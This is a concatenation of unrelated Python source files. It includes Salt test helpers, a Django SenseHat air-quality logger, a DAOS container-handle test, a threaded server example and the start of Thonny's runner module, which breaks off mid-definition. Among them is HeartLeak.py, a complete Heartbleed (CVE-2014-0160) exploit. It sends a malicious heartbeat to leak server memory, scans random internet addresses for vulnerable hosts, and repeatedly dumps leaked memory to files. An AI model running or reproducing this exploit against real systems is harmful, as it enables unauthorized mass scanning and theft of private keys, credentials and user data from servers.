    def url(self, path):
        """
        Convenience function which, given a file path, will return a URL that
        points to that path. If the path is relative, it will just be appended
        to self.web_root.
        """
        if self.web_root is None:
            raise RuntimeError("Webserver instance has not been started")
        err_msg = (
            "invalid path, must be either a relative path or a path "
            "within {}".format(self.root)
        )
        try:
            relpath = (
                path if not os.path.isabs(path) else os.path.relpath(path, self.root)
            )
            if relpath.startswith(".." + os.sep):
                raise ValueError(err_msg)
            return "/".join((self.web_root, relpath))
        except AttributeError:
            raise ValueError(err_msg)

    def start(self):
        """
        Starts the webserver
        """
        if self.port is None:
            self.port = get_unused_localhost_port()

        self.web_root = "http{}://127.0.0.1:{}".format(
            "s" if self.ssl_opts else "", self.port
        )

        self.server_thread = threading.Thread(target=self.target)
        self.server_thread.daemon = True
        self.server_thread.start()

        # Poll once per second until the server is accepting connections
        # or the timeout elapses.
        for idx in range(self.wait + 1):
            if self.listening:
                break
            if idx != self.wait:
                time.sleep(1)
        else:
            raise Exception(
                "Failed to start tornado webserver on 127.0.0.1:{} within "
                "{} seconds".format(self.port, self.wait)
            )

    def stop(self):
        """
        Stops the webserver
        """
        self.ioloop.add_callback(self.ioloop.stop)
        self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
    """
    Save all requests sent to the server.
    """

    # Class-level store: shared by every instance so tests can inspect all
    # requests received by the server after the fact.
    received_requests = []

    def post(self, *args):  # pylint: disable=arguments-differ
        """
        Handle the post
        """
        self.received_requests.append(self.request)

    def data_received(self):  # pylint: disable=arguments-differ
        """
        Streaming not used for testing
        """
        raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
    """
    Mirror a POST body back to the client
    """

    def post(self, *args):  # pylint: disable=arguments-differ
        """
        Handle the post
        """
        # Echo the raw request body verbatim.
        body = self.request.body
        log.debug("Incoming body: %s  Incoming args: %s", body, args)
        self.write(body)

    def data_received(self):  # pylint: disable=arguments-differ
        """
        Streaming not used for testing
        """
        raise NotImplementedError()
def dedent(text, linesep=os.linesep):
    """
    A wrapper around textwrap.dedent that also sets line endings.
    """
    sep = salt.utils.stringutils.to_unicode(linesep)
    dedented = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
    normalized = sep.join(dedented.splitlines())
    # Preserve a trailing newline (splitlines drops it).
    if dedented.endswith("\n"):
        normalized += sep
    # Preserve the input type: bytes in -> bytes out.
    if isinstance(text, str):
        return normalized
    return salt.utils.stringutils.to_bytes(normalized)
class PatchedEnviron:
    """Context manager that temporarily patches ``os.environ``.

    Keyword Args:
        __cleanup__: Iterable of variable names removed while the patch is
            active.
        Any other keyword argument becomes an environment variable for the
        duration of the ``with`` block. The previous environment is fully
        restored on exit.
    """

    def __init__(self, **kwargs):
        self.cleanup_keys = kwargs.pop("__cleanup__", ())
        self.kwargs = kwargs
        self.original_environ = None

    def __enter__(self):
        self.original_environ = os.environ.copy()
        for key in self.cleanup_keys:
            os.environ.pop(key, None)

        # NOTE: the Python 2 unicode work-around that used to live here
        # (re-encoding str keys/values) was dead code on Python 3 and has
        # been removed.
        os.environ.update(**self.kwargs)
        return self

    def __exit__(self, *args):
        # Restore the snapshot taken in __enter__ wholesale.
        os.environ.clear()
        os.environ.update(self.original_environ)


patched_environ = PatchedEnviron
class VirtualEnv:
    """Context manager that creates a throw-away virtualenv for a test.

    Usage::

        with VirtualEnv() as venv:
            venv.install("some-package")
            venv.run(venv.venv_python, "-c", "...")

    The virtualenv directory is deleted on exit.
    """

    def __init__(self, venv_dir=None, env=None):
        # Where the virtualenv will live; default under the test-suite TMP.
        self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
        # Start from the current environment, optionally overridden by ``env``.
        environ = os.environ.copy()
        if env:
            environ.update(env)
        self.environ = environ
        # Interpreter path differs by platform (Scripts\ vs bin/).
        if salt.utils.platform.is_windows():
            self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
        else:
            self.venv_python = os.path.join(self.venv_dir, "bin", "python")
        self.venv_bin_dir = os.path.dirname(self.venv_python)

    def __enter__(self):
        try:
            self._create_virtualenv()
        except subprocess.CalledProcessError:
            raise AssertionError("Failed to create virtualenv")
        return self

    def __exit__(self, *args):
        # Remove the whole virtualenv tree.
        salt.utils.files.rm_rf(self.venv_dir)

    def install(self, *args, **kwargs):
        """Run ``pip install`` inside the virtualenv."""
        return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)

    def run(self, *args, **kwargs):
        """Run a command with the virtualenv's environment.

        Returns a ProcessResult; raises ProcessFailed when ``check`` is True
        (the default) and the command exits non-zero.
        """
        check = kwargs.pop("check", True)
        kwargs.setdefault("cwd", self.venv_dir)
        kwargs.setdefault("stdout", subprocess.PIPE)
        kwargs.setdefault("stderr", subprocess.PIPE)
        kwargs.setdefault("universal_newlines", True)
        kwargs.setdefault("env", self.environ)
        # check=False here so we can wrap the failure in ProcessFailed below.
        proc = subprocess.run(args, check=False, **kwargs)
        ret = ProcessResult(
            exitcode=proc.returncode,
            stdout=proc.stdout,
            stderr=proc.stderr,
            cmdline=proc.args,
        )
        log.debug(ret)
        if check is True:
            try:
                proc.check_returncode()
            except subprocess.CalledProcessError:
                raise ProcessFailed(
                    "Command failed return code check",
                    cmdline=proc.args,
                    stdout=proc.stdout,
                    stderr=proc.stderr,
                    exitcode=proc.returncode,
                )
        return ret

    def _get_real_python(self):
        """
        The reason why the virtualenv creation is proxied by this function is mostly
        because under windows, we can't seem to properly create a virtualenv off of
        another virtualenv(we can on linux) and also because, we really don't want to
        test virtualenv creation off of another virtualenv, we want a virtualenv created
        from the original python.
        Also, on windows, we must also point to the virtualenv binary outside the existing
        virtualenv because it will fail otherwise
        """
        try:
            # ``sys.real_prefix`` only exists when running inside a
            # virtualenv; the AttributeError below is the non-venv case.
            if salt.utils.platform.is_windows():
                return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
            else:
                python_binary_names = [
                    "python{}.{}".format(*sys.version_info),
                    "python{}".format(*sys.version_info),
                    "python",
                ]
                for binary_name in python_binary_names:
                    python = os.path.join(sys.real_prefix, "bin", binary_name)
                    if os.path.exists(python):
                        break
                else:
                    raise AssertionError(
                        "Couldn't find a python binary name under '{}' matching: {}".format(
                            os.path.join(sys.real_prefix, "bin"), python_binary_names
                        )
                    )
                return python
        except AttributeError:
            return sys.executable

    def _create_virtualenv(self):
        # Use the salt virtualenv module to build the venv, then refresh
        # pip and pin setuptools below 50 (known breakage; see link).
        sminion = create_sminion()
        sminion.functions.virtualenv.create(
            self.venv_dir, python=self._get_real_python()
        )
        self.install("-U", "pip")
        # https://github.com/pypa/setuptools/issues?q=is%3Aissue+setuptools+50+
        self.install("-U", "setuptools<50.0.0")
@contextmanager
def change_cwd(path):
    """
    Context manager helper to change CWD for a with code block and restore
    it at the end
    """
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        # Restore the original working directory.
        os.chdir(previous)
@functools.lru_cache(maxsize=1)
def get_virtualenv_binary_path():
    """Locate a ``virtualenv`` binary belonging to the real (non-venv)
    Python installation, or return None when not available.

    Result is cached for the life of the process (lru_cache).
    """
    # Under windows we can't seem to properly create a virtualenv off of another
    # virtualenv, we can on linux but we will still point to the virtualenv binary
    # outside the virtualenv running the test suite, if that's the case.
    try:
        # Raises AttributeError when not inside a virtualenv -- see the
        # except clause at the bottom.
        real_prefix = sys.real_prefix
        # The above attribute exists, this is a virtualenv
        if salt.utils.platform.is_windows():
            virtualenv_binary = os.path.join(real_prefix, "Scripts", "virtualenv.exe")
        else:
            # We need to remove the virtualenv from PATH or we'll get the virtualenv binary
            # from within the virtualenv, we don't want that
            path = os.environ.get("PATH")
            if path is not None:
                path_items = path.split(os.pathsep)
                for item in path_items[:]:
                    if item.startswith(sys.base_prefix):
                        path_items.remove(item)
                os.environ["PATH"] = os.pathsep.join(path_items)
            virtualenv_binary = salt.utils.path.which("virtualenv")
            if path is not None:
                # Restore previous environ PATH
                os.environ["PATH"] = path
            # NOTE(review): when ``which`` returned None the next line raises
            # AttributeError, which is swallowed by the handler below and
            # yields None -- intentional-looking but fragile; confirm before
            # restructuring this try/except.
            if not virtualenv_binary.startswith(real_prefix):
                virtualenv_binary = None
        if virtualenv_binary and not os.path.exists(virtualenv_binary):
            # It doesn't exist?!
            virtualenv_binary = None
    except AttributeError:
        # We're not running inside a virtualenv
        virtualenv_binary = None
    return virtualenv_binary
|
HeartLeak.py | #!/usr/bin/env python27
#=========================================================#
# [+] Title: HeartLeak (CVE-2014-0160) #
# [+] Script: HeartLeak.py #
# [+] Twitter: https://twitter.com/OffensivePython #
# [+] Blog: http://pytesting.blogspot.com #
#=========================================================#
import socket
import struct
import sys
import time
import random
import threading
from optparse import OptionParser
class heartleak(object):
    """Minimal TLS client that triggers the Heartbleed (CVE-2014-0160) leak.

    NOTE: Python 2 only -- binary protocol data is kept in ``str`` and read
    with ``ord(payload[0])``; under Python 3 the socket returns ``bytes``
    and the string concatenation/indexing here would break.
    """

    def __init__(self, host, port=443, verbose=False):
        try:
            self.sick=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sick.connect((host, port))
        except socket.error:
            # NOTE(review): returning from __init__ still produces a
            # (partially initialized) instance; ``if target`` in callers is
            # always truthy, so connection failures are not really detected
            # this way -- confirm intent.
            return None
        # Captured TLSv1.1 ClientHello record, sent verbatim.
        self.hello="\x16\x03\x02\x00\xdc\x01\x00\x00\xd8\x03\x02\x53\x43\x5b\x90\x9d"
        self.hello+="\x9b\x72\x0b\xbc\x0c\xbc\x2b\x92\xa8\x48\x97\xcf\xbd\x39\x04\xcc"
        self.hello+="\x16\x0a\x85\x03\x90\x9f\x77\x04\x33\xd4\xde\x00\x00\x66\xc0\x14"
        self.hello+="\xc0\x0a\xc0\x22\xc0\x21\x00\x39\x00\x38\x00\x88\x00\x87\xc0\x0f"
        self.hello+="\xc0\x05\x00\x35\x00\x84\xc0\x12\xc0\x08\xc0\x1c\xc0\x1b\x00\x16"
        self.hello+="\x00\x13\xc0\x0d\xc0\x03\x00\x0a\xc0\x13\xc0\x09\xc0\x1f\xc0\x1e"
        self.hello+="\x00\x33\x00\x32\x00\x9a\x00\x99\x00\x45\x00\x44\xc0\x0e\xc0\x04"
        self.hello+="\x00\x2f\x00\x96\x00\x41\xc0\x11\xc0\x07\xc0\x0c\xc0\x02\x00\x05"
        self.hello+="\x00\x04\x00\x15\x00\x12\x00\x09\x00\x14\x00\x11\x00\x08\x00\x06"
        self.hello+="\x00\x03\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00\x01\x02"
        self.hello+="\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c"
        self.hello+="\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07"
        self.hello+="\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02"
        self.hello+="\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f\x00\x01"
        self.hello+="\x01"
        # Malicious heartbeat: declares a 0xFFEC-byte payload while actually
        # sending 3 bytes, causing a vulnerable server to leak memory.
        self.hb="\x18\x03\x02\x00\x03\x01\xFF\xEC"
        self.verbose=verbose

    def receive(self, op):
        """Read one TLS record.

        op=1 reads a handshake record (exactly ``length`` payload bytes);
        any other op reads heartbeat data until the socket times out.
        Returns (type, version, data) or (None, None, None) on error.
        """
        data=''
        chunk=''
        typ, version, length = None, None, None
        try:
            data=self.sick.recv(5)
        except socket.error:
            return None, None, None
        if data:
            # 5-byte TLS record header: type(1), version(2), length(2), big-endian.
            typ, version, length = struct.unpack('>BHH', data)
            if typ==None:
                return None, None, None
            else:
                if op==1: # handshake
                    data=self.sick.recv(length)
                else: # heartbeat
                    # recveive all data sent by the server
                    # (appends to ``data``, so the 5 header bytes are
                    # included in the returned payload)
                    while True:
                        try:
                            chunk = self.sick.recv(0xFFFF)
                            data+=chunk
                        except socket.error:
                            break
                return typ, version, data
        else:
            return None, None, None

    def handshake(self):
        """Send the ClientHello and wait for the handshake to complete.

        Returns True on success, None when the host doesn't speak SSL.
        """
        self.sick.send(self.hello) # send handshake
        while True:
            if self.verbose:
                print("[+] Sending SSL Handshake")
            typ, version, payload = self.receive(1)
            if typ==None:
                if self.verbose:
                    print("[-] Host doesn't support OpenSSL")
                return None
            # Handshake record (22) whose first message byte is
            # ServerHelloDone (0x0E).
            if typ==22 and ord(payload[0])==0x0E:
                if self.verbose:
                    print("[+] Received Hello back")
                # Received hello back
                break
        return True

    def heartbeat(self):
        """Send the malicious heartbeat; return leaked data or False."""
        if self.verbose:
            print("[+] Sending malicious heartbeat request")
        self.sick.send(self.hb)
        while True:
            typ, version, payload = self.receive(2)
            if typ==None or typ==21:
                # Socket error or TLS alert (21): not vulnerable.
                return False
            if typ==24:
                # Heartbeat record: more than the echoed bytes means a leak.
                if len(payload)>3:
                    return payload
                else:
                    return False

    def destroy(self):
        """ Close connection """
        if self.verbose:
            print("[+] Closing Connection")
        self.sick.close()
def leakTest(hFile, host, port=443):
    """Probe *host* for SSL support and test it for Heartbleed.

    Vulnerable hosts are appended to *hFile* and the global countdown ``n``
    (remaining hosts to find) is decremented.
    """
    global n
    sick = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # First a plain TCP probe to see whether the port is open at all.
        sick.connect((host, port))
        sick.close()
        print("[+] %s supports SSL, trying to trigger the bug" % host)
        target = heartleak(host)
        if target and target.handshake():
            if target.heartbeat():
                print("-{#}-- %s is vulnerable -{#}--" % host)
                if port == 443:
                    hFile.write(host + '\r\n')
                else:
                    # ``port`` is an int: convert before concatenating;
                    # previously this line raised TypeError for non-443 ports.
                    hFile.write(host + ":" + str(port) + '\r\n')
                n -= 1
                if n > 0:
                    print("[+] Still looking for %d vulnerable hosts" % n)
            target.destroy()
    except socket.error:
        sick.close()
def scan(nhost, port, nthread):
    """Scan random IPv4 addresses until *nhost* vulnerable hosts are found.

    Results are appended to ``heartleaked.log``; at most *nthread* worker
    threads run concurrently.
    """
    hFile = open("heartleaked.log", "a")
    global n
    print("[+] Running a scan to find %d vulnerable host(s). Be patient!" % nhost)
    n = nhost
    while n > 0:
        try:
            ip = randomHost()
            try:
                # Throttle thread creation.
                while threading.activeCount() > nthread:
                    time.sleep(5)
                t = threading.Thread(target=leakTest, args=(hFile, ip, port))
                t.start()
            except Exception:
                # Was a bare ``except:`` which also swallowed
                # KeyboardInterrupt, making the handler below unreachable
                # during thread start-up/throttling.
                time.sleep(5)
        except KeyboardInterrupt:
            print("[-] Cancelled due to keyboard interruption")
            break
    hFile.close()
    return
def getStrings(data):
    """Extract printable-ASCII runs of four or more characters from *data*.

    Returns the runs concatenated, each terminated by CRLF.
    """
    length = len(data)
    printable = ''
    i = 0
    while i < length:
        j = i
        # Advance over printable characters (0x20..0x7E). Checking the bound
        # *before* indexing lets a run extend to the final byte; the old
        # ``j < length - 1`` test silently dropped the last character.
        while j < length and 31 < ord(data[j]) < 127:
            j += 1
        if j - i > 3:  # if found a string of 4 bytes or more
            printable += data[i:j] + "\r\n"
            i = j
        else:
            i += 1
    return printable
def monitor(host, port):
    """Repeatedly leak memory from *host*, logging printable and raw data."""
    print("-{# Sniffing data from %s" % host)
    print("-{# Printable data will be stored in %s" % host + ".txt")
    print("-{# Raw data will be stored in %s" % host + ".bin")
    ascii = open(host + ".txt", "a")
    binary = open(host + ".bin", "wb")
    while True:
        target = heartleak(host, port, verbose=True)
        if target and target.handshake():
            try:
                leaked = target.heartbeat()
                # ``heartbeat`` returns False on failure; writing False to a
                # binary file would raise TypeError, so only log real data.
                if leaked:
                    binary.write(leaked)
                    strings = getStrings(leaked)
                    ascii.write(strings)
                    print(strings)
                time.sleep(10)
            except KeyboardInterrupt:
                target.destroy()
                break
    ascii.close()
    binary.close()
def randomHost():
    """ Generates a random IP address """
    # Four random octets joined with dots.
    return ".".join(str(random.randint(0, 255)) for _ in range(4))
def main():
    """Parse the command line and dispatch to ``scan`` or ``monitor``."""
    usage = "Usage: %prog arg [options]\n"
    usage += "Example:\n"
    usage += " %prog monitor --server=example.com\n"
    usage += " %prog scan --nhost=10 --threads=50\n"
    parser = OptionParser(usage)
    parser.add_option("-n", "--nhost", dest="nhost", type="int",
                      help="Number of Hosts", default=1)
    parser.add_option("-t", "--threads", dest="nthread", type="int",
                      help="Number of threads (Default: 10 threads)",
                      default=10)
    parser.add_option("-s", "--server", dest="host", type="string",
                      help="Target (IP Address) to monitor")
    parser.add_option("-p", "--port", dest="port", type="int",
                      help="Port number (default: 443)", default=443)
    options, args = parser.parse_args()
    socket.setdefaulttimeout(10)
    if not args:
        parser.print_help()
        return
    command = args[0]
    if command == "scan":
        scan(options.nhost, options.port, options.nthread)
    elif command == "monitor" and options.host:
        monitor(options.host, options.port)
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
|
herebedragons.py | # Django specific settings
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
# Django imports
from django.core.management.base import BaseCommand
# Application specific imports
# standard libs
import uuid
import datetime
import threading
import queue
# other libs
from sense_hat import SenseHat
# models
from aqms.models import *
# queues for communication between threads
#q_gen_messdaten = queue.Queue()
# Unbounded FIFO shared by the sensor thread (producer) and the DB thread
# (consumer).
q_to_db = queue.Queue()
class Command(BaseCommand):
    """Django management command: sample SenseHat data and persist it.

    Spawns a producer thread (sensor readings -> queue) and a consumer
    thread (queue -> database) while the main thread scrolls a banner on
    the LED matrix forever.
    """

    # Application logic,
    @classmethod
    def handle(cls, *args, **kwargs):
        # NOTE(review): ``handle`` as a classmethod is unusual for a Django
        # BaseCommand (normally an instance method) -- confirm how this
        # command is invoked.
        print("get data")
        try:
            pill2kill = threading.Event()  # -> cyanide pills
            gen_messdaten_thread = threading.Thread(target=SENSORIO.gen_messdaten_t, args=(pill2kill,))
            gen_messdaten_thread.daemon = True  # -> dies after main thread is closed
            gen_messdaten_thread.start()
            to_db_thread = threading.Thread(target=DBIO.to_db_t, args=(pill2kill,))
            to_db_thread.daemon = True  # -> dies after main thread is closed
            to_db_thread.start()
            #SenseHat.show_message("#", scroll_speed=1)
            # Blocks forever; the finally-block below only runs when an
            # exception (e.g. KeyboardInterrupt) escapes the display loop.
            cls.get_message('')
        finally:
            # Signal both worker threads to stop and wait for them.
            pill2kill.set()
            gen_messdaten_thread.join()
            to_db_thread.join()
            #return ('done', arg_counter)

    @staticmethod
    def get_message(placeholder):
        # Endless display loop: re-creates the SenseHat every iteration and
        # scrolls the banner text in red.
        while True:
            sense = SenseHat()
            sense.clear()
            red = (255,0,0)
            sense.show_message("HTL - TATü", text_colour=red)
# SENSORIO class -> handles all input/output from/to the sensors
class SENSORIO:
    """Producer side: samples sensor data and feeds the DB queue."""

    # meths
    @staticmethod
    def gen_messdaten_t(pill2kill):  # <- code of gen_messdaten_t thread
        """Thread body: build MESSDATEN samples until *pill2kill* is set."""
        #fe_log = None
        try:
            while not pill2kill.is_set():
                try:
                    sample = MESSDATEN()
                    q_to_db.put(sample)
                except Exception as err:
                    print('fufufufu' + str(err))
                    #fe_log = FILEIO.write_to_log('fe_log.txt', f'S_LINK_Error: {e}\n{traceback.format_exc()}')
                    continue
        finally:
            #if fe_log:
            #    CLIIO.print_to_shell('file create_slink_t error -> {root_dir}fe_log.txt')
            print('gen_messdaten_t closed')
# DBIO class -> handles all input/output from/to database
class DBIO:
    """Consumer side: drains the measurement queue into the database."""

    # meths
    @staticmethod
    def to_db_t(pill2kill):  # <- code of to_db_t thread
        """Thread body: persist queued MESSDATEN rows until told to stop."""
        #dbe_log = None
        try:
            # NOTE(review): ``q_to_db.full()`` on an unbounded Queue is never
            # True, and ``get(block=True)`` can wait forever after the pill
            # is set -- presumably ``not q_to_db.empty()`` was intended;
            # confirm before changing.
            while not pill2kill.is_set() or q_to_db.full():
                messdaten = q_to_db.get(block=True)  # -> wait for input
                print(str(messdaten) + '\n')
                if isinstance(messdaten, MESSDATEN):
                    values_for_db = messdaten.for_db()
                    # push to db
                    messdaten_db = Messdaten(UID=values_for_db['uuid'], \
                        Temperatur=values_for_db['temperatur'], \
                        Luftdruck=values_for_db['luftdruck'], \
                        Luftfeuchtigkeit=values_for_db['luftfeuchtigkeit'], \
                        VOC=values_for_db['voc'], \
                        FEINSTAUBPM25=values_for_db['feinstaubpm25'], \
                        FEINSTAUBPM100=values_for_db['feinstaubpm100'], \
                        Datum=values_for_db['datum'], \
                        DatumZeit=values_for_db['datumzeit'])
                    messdaten_db.save()
                q_to_db.task_done()
        finally:
            #if fe_log:
            #    CLIIO.print_to_shell('file create_slink_t error -> {root_dir}fe_log.txt')
            print('to_db_t closed')
# super EVIL object -> data of folders
class MESSDATEN:
    """One snapshot of all air-quality measurements plus identity/timestamps."""

    # fields -- class-level defaults; every one is shadowed by an instance
    # attribute assigned in __init__, so these effectively serve only as
    # documentation of the expected fields.
    _uuid = ''
    _temperatur = 22
    _luftdruck = 949
    _luftfeuchtigkeit = 53
    _voc = 2.5864
    _feinstaubpm25= 4.279
    _feinstaubpm100 = 5.627
    _datum = ''
    _datumzeit = ''

    # ctor
    def __init__(self):
        # initialize sensor
        sense = SenseHat()
        # define data
        self._uuid = str(uuid.uuid4())
        self._temperatur = sense.get_temperature()
        self._luftdruck = sense.get_pressure()
        self._luftfeuchtigkeit = sense.get_humidity()
        # The external helpers return text, so these three stay strings --
        # presumably the DB layer converts them; TODO confirm expected types.
        self._voc = os.popen('aqms/external/c/airsensor -o -v').read().rstrip('\n')
        self._feinstaubpm25 = os.popen('aqms/external/bash/Feinstaub25.sh').read().rstrip('\n')
        self._feinstaubpm100 = os.popen('aqms/external/bash/Feinstaub100.sh').read().rstrip('\n')
        self._datum = datetime.date.today()
        self._datumzeit = datetime.datetime.now()

    def __repr__(self):
        return str(self.__class__.__name__) + '; ' + str(self._datumzeit)

    def __str__(self):
        return 'uuid: ' + str(self._uuid) + '; \n' + \
            'temperatur: ' + str(self._temperatur) + '; \n' + \
            'luftdruck: ' + str(self._luftdruck) + '; \n' + \
            'luftfeuchtigkeit: ' + str(self._luftfeuchtigkeit) + '; \n' + \
            'voc: ' + str(self._voc) + '; \n' + \
            'feinstaubpm25: ' + str(self._feinstaubpm25) + '; \n' + \
            'feinstaubpm100: ' + str(self._feinstaubpm100) + '; \n' + \
            'datum:' + str(self._datum) + '; \n' + \
            'datumzeit:' + str(self._datumzeit)

    # props
    def get_uuid(self):
        # Accessor for the generated measurement UUID.
        return self._uuid

    def for_db(self):
        """Return the measurement as a dict keyed for the Messdaten model."""
        return {
            'uuid': self._uuid,
            'temperatur': self._temperatur,
            'luftdruck': self._luftdruck,
            'luftfeuchtigkeit': self._luftfeuchtigkeit,
            'voc': self._voc,
            'feinstaubpm25': self._feinstaubpm25,
            'feinstaubpm100': self._feinstaubpm100,
            'datum': self._datum,
            'datumzeit': self._datumzeit
        }
|
srv_threaded.py | #!/usr/bin/env python3
# Foundations of Python Network Programming, Third Edition
# https://github.com/brandon-rhodes/fopnp/blob/m/py3/chapter07/srv_threaded.py
# Using multiple threads to serve several clients in parallel.
import zen_utils
from threading import Thread
def start_threads(listener, workers=4):
    """Spawn *workers* threads that all accept connections on *listener*."""
    thread_args = (listener,)
    for _ in range(workers):
        Thread(target=zen_utils.accept_connections_forever, args=thread_args).start()
if __name__ == '__main__':
    # Script entry point: parse the listen address, bind the server socket,
    # then serve with the default number of worker threads.
    address = zen_utils.parse_command_line('multi-threaded server')
    listener = zen_utils.create_srv_socket(address)
    start_threads(listener)
|
global_handle.py | #!/usr/bin/python
'''
(C) Copyright 2018-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
import ctypes
import traceback
from multiprocessing import sharedctypes
from avocado import fail_on
from apricot import TestWithServers
from pydaos.raw import DaosPool, DaosContainer, DaosApiError, IOV
class GlobalHandle(TestWithServers):
    """Test the ability to share container handles among processes.

    :avocado: recursive
    """

    @fail_on(DaosApiError)
    def check_handle(self, pool_glob_handle, uuidstr, cont_glob_handle, rank):
        """Verify that the global handles can be turned into local handles.

        This gets run in a child process and verifies the global handles can be
        turned into local handles in another process.

        Args:
            pool_glob_handle (sharedctypes.RawValue): pool handle
            uuidstr (sharedctypes.RawArray): pool uuid
            cont_glob_handle (sharedctypes.RawValue): container handle
            rank (int): pool svc rank

        Raises:
            DaosApiError: if there was an error converting the pool handle or
                using the local pool handle to create a container.
        """
        # setup the pool and connect using global handle
        pool = DaosPool(self.context)
        pool.uuid = uuidstr
        pool.set_svc(rank)
        pool.group = "daos_server"

        # Copy the raw global-handle bytes out of the shared IOV into a
        # plain bytearray that global2local can consume.
        buf = ctypes.cast(
            pool_glob_handle.iov_buf,
            ctypes.POINTER(ctypes.c_byte * pool_glob_handle.iov_buf_len))
        buf2 = bytearray()
        buf2.extend(buf.contents)
        pool_handle = pool.global2local(
            self.context, pool_glob_handle.iov_len,
            pool_glob_handle.iov_buf_len, buf2)

        # perform an operation that will use the new handle, if it
        # doesn't throw an exception, then all is well.
        pool.pool_query()

        # setup the container and then connect using the global handle
        container = DaosContainer(self.context)
        container.poh = pool_handle
        buf = ctypes.cast(
            cont_glob_handle.iov_buf,
            ctypes.POINTER(ctypes.c_byte * cont_glob_handle.iov_buf_len))
        buf2 = bytearray()
        buf2.extend(buf.contents)
        dummy_cont_handle = container.global2local(
            self.context, cont_glob_handle.iov_len,
            cont_glob_handle.iov_buf_len, buf2)

        # just try one thing to make sure handle is good
        container.query()

    def test_global_handle(self):
        """Test ID: Jira-XXXX.

        Test Description: Use a pool handle in another process.

        :avocado: tags=all,daily_regression
        :avocado: tags=tiny
        :avocado: tags=container,global_handle,container_global_handle
        """
        # initialize a python pool object then create the underlying
        # daos storage and connect to it
        self.add_pool(create=True, connect=True)

        # create a pool global handle
        iov_len, buf_len, buf = self.pool.pool.local2global()
        buftype = ctypes.c_byte * buf_len
        c_buf = buftype.from_buffer(buf)
        # Wrap the serialized handle in a shared-memory IOV so it could be
        # handed to a child process.
        sct_pool_handle = (
            sharedctypes.RawValue(
                IOV, ctypes.cast(c_buf, ctypes.c_void_p), buf_len, iov_len))

        # create a container
        self.add_container(self.pool)
        self.container.open()

        try:
            # create a container global handle
            iov_len, buf_len, buf = self.container.container.local2global()
            buftype = ctypes.c_byte * buf_len
            c_buf = buftype.from_buffer(buf)
            sct_cont_handle = (
                sharedctypes.RawValue(
                    IOV, ctypes.cast(c_buf, ctypes.c_void_p), buf_len, iov_len))
            sct_pool_uuid = sharedctypes.RawArray(
                ctypes.c_byte, self.pool.pool.uuid)
            # this should work in the future but need on-line server addition
            # arg_list = (
            # p = Process(target=check_handle, args=arg_list)
            # p.start()
            # p.join()

            # for now verifying global handle in the same process which is not
            # the intended use case
            self.check_handle(
                sct_pool_handle, sct_pool_uuid, sct_cont_handle, 0)
        except DaosApiError as error:
            self.log.error(error)
            self.log.error(traceback.format_exc())
            self.fail("Expecting to pass but test has failed.\n")
|
running.py | # -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import shlex
import shutil
import signal
import subprocess
import sys
import time
import traceback
from logging import debug
from threading import Thread
from time import sleep
from thonny import (
THONNY_USER_DIR,
common,
get_runner,
get_shell,
get_workbench,
ui_utils,
)
from thonny.code import get_current_breakpoints,\
get_saved_current_script_filename
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
normpath_with_actual_case,
is_same_path,
parse_message,
path_startswith,
serialize_message,
update_system_path)
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from typing import Any, List, Optional, Sequence, Set # @UnusedImport; @UnusedImport
from thonny.terminal import run_in_terminal
from thonny.ui_utils import select_sequence
WINDOWS_EXE = "python.exe"
class Runner:
    """GUI-side coordinator of the back-end process.
    Tracks the backend state, forwards commands and program input to the
    backend proxy, polls the proxy for messages and republishes them as
    workbench events, and (re)creates the proxy on restart.
    """
    def __init__(self) -> None:
        get_workbench().set_default("run.auto_cd", True)
        self._init_commands()
        # initial state before the first ToplevelResponse arrives;
        # steady-state values are listed in get_state()
        self._state = "starting"
        self._proxy = None  # type: Any
        self._publishing_events = False
        self._polling_after_id = None
        self._postponed_commands = []  # type: List[CommandToBackend]
    def _remove_obsolete_jedi_copies(self) -> None:
        # Thonny 2.1 used to copy jedi in order to make it available
        # for the backend. Get rid of it now
        for item in os.listdir(THONNY_USER_DIR):
            if item.startswith("jedi_0."):
                shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
    def start(self) -> None:
        """Attach a console if needed (Windows) and launch the first backend."""
        self._check_alloc_console()
        self.restart_backend(False, True)
        # temporary
        self._remove_obsolete_jedi_copies()
    def _init_commands(self) -> None:
        """Register the run/stop/interrupt commands with the workbench."""
        get_workbench().set_default("run.run_in_terminal_python_repl", False)
        get_workbench().set_default("run.run_in_terminal_keep_open", True)
        get_workbench().add_command(
            "run_current_script",
            "run",
            "Run current script",
            caption="Run",
            handler=self._cmd_run_current_script,
            default_sequence="<F5>",
            extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
            tester=self._cmd_run_current_script_enabled,
            group=10,
            image="run-current-script",
            include_in_toolbar=True,
            show_extra_sequences=True,
        )
        get_workbench().add_command(
            "run_current_script_in_terminal",
            "run",
            "Run current script in terminal",
            caption="RunT",
            handler=self._cmd_run_current_script_in_terminal,
            default_sequence="<Control-t>",
            extra_sequences=["<<CtrlTInText>>"],
            tester=self._cmd_run_current_script_in_terminal_enabled,
